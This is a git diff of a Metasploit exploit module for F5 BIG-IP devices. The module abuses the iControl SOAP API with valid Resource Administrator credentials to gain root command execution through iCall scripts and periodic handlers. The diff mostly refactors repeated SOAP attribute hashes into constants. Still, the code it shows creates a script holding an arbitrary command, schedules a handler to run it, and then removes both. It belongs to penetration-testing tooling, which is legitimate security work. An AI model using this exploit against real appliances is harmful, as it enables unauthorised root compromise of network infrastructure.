diff --git a/modules/exploits/linux/http/f5_icall_cmd.rb b/modules/exploits/linux/http/f5_icall_cmd.rb index 67f5126cc7..86df148ddf 100644 --- a/modules/exploits/linux/http/f5_icall_cmd.rb +++ b/modules/exploits/linux/http/f5_icall_cmd.rb @@ -11,16 +11,22 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper + SOAPENV_ENCODINGSTYLE = { "soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/" } + STRING_ATTRS = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' } + LONG_ATTRS = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' } + def initialize(info = {}) super( update_info( info, 'Name' => "F5 iControl iCall::Script Root Command Execution", 'Description' => %q{ - This module exploits an authenticated a privilege escalation vulnerability - in the iControl API on the F5 BIG-IP LTM (and likely other F5 devices). The attacker needs valid - credentials and the Resource Administrator role. The exploit should work on BIG-IP 11.3.0 - 11.6.0, - (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references for more details) + This module exploits an authenticated privilege escalation + vulnerability in the iControl API on the F5 BIG-IP LTM (and likely + other F5 devices). This requires valid credentials and the Resource + Administrator role. The exploit should work on BIG-IP 11.3.0 + - 11.6.0, (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references + for more details) }, 'License' => MSF_LICENSE, 'Author' => @@ -112,13 +118,12 @@ class Metasploit3 < Msf::Exploit::Remote def create_script(cmd) scriptname = Rex::Text.rand_text_alpha_lower(5) create_xml = build_xml do |xml| - xml['scr'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do - string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' } - xml.scripts(string_attrs) do + xml['scr'].create(SOAPENV_ENCODINGSTYLE) do + xml.scripts(STRING_ATTRS) do xml.parent.namespace = xml.parent.parent.namespace_definitions.first xml.item scriptname end - xml.definitions(string_attrs) do + xml.definitions(STRING_ATTRS) do xml.parent.namespace = xml.parent.parent.namespace_definitions.first xml.item cmd end @@ -129,9 +134,8 @@ class Metasploit3 < Msf::Exploit::Remote def delete_script(scriptname) delete_xml = build_xml do |xml| - xml['scr'].delete_script("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do - string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' } - xml.scripts(string_attrs) do + xml['scr'].delete_script(SOAPENV_ENCODINGSTYLE) do + xml.scripts(STRING_ATTRS) do xml.parent.namespace = xml.parent.parent.namespace_definitions.first xml.item scriptname end @@ -142,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote def script_exists(scriptname) exists_xml = build_xml do |xml| - xml['scr'].get_list("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") + xml['scr'].get_list(SOAPENV_ENCODINGSTYLE) end res = send_soap_request(exists_xml) res && res.code == 200 && res.body =~ Regexp.new("/Common/#{scriptname}") @@ -151,18 +155,16 @@ class Metasploit3 < Msf::Exploit::Remote def create_handler(scriptname, interval) handler_name = Rex::Text.rand_text_alpha_lower(5) handler_xml = build_xml do |xml| - xml['per'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do - string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' } - xml.handlers(string_attrs) do + xml['per'].create(SOAPENV_ENCODINGSTYLE) do + xml.handlers(STRING_ATTRS) do xml.parent.namespace = xml.parent.parent.namespace_definitions.first xml.item handler_name end - xml.scripts(string_attrs) do + xml.scripts(STRING_ATTRS) do xml.parent.namespace = xml.parent.parent.namespace_definitions.first xml.item scriptname end - long_attrs = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' } - xml.intervals(long_attrs) do + xml.intervals(LONG_ATTRS) do xml.parent.namespace = xml.parent.parent.namespace_definitions.first xml.item interval end @@ -173,9 +175,8 @@ class Metasploit3 < Msf::Exploit::Remote def delete_handler(handler_name) delete_xml = build_xml do |xml| - xml['per'].delete_handler("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do - attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' } - xml.handlers(attrs) do + xml['per'].delete_handler(SOAPENV_ENCODINGSTYLE) do + xml.handlers(STRING_ATTRS) do xml.parent.namespace = xml.parent.parent.namespace_definitions.first xml.item handler_name end @@ -187,7 +188,7 @@ class Metasploit3 < Msf::Exploit::Remote def handler_exists(handler_name) handler_xml = build_xml do |xml| - xml['per'].get_list("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") + xml['per'].get_list(SOAPENV_ENCODINGSTYLE) end res = send_soap_request(handler_xml) res && res.code == 200 && res.body =~ Regexp.new("/Common/#{handler_name}") @@ -200,13 +201,12 @@ class Metasploit3 < Msf::Exploit::Remote # if the user/password is wrong, a 401 error is returned, the server might or might not be vulnerable # any other response is considered not vulnerable check_xml = build_xml do |xml| - xml['scr'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do - attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' } - xml.scripts(attrs) do + xml['scr'].create(SOAPENV_ENCODINGSTYLE) do + xml.scripts(STRING_ATTRS) do xml.parent.namespace = xml.parent.parent.namespace_definitions.first xml.item end - xml.definitions(attrs) do + xml.definitions(STRING_ATTRS) do xml.parent.namespace = xml.parent.parent.namespace_definitions.first xml.item end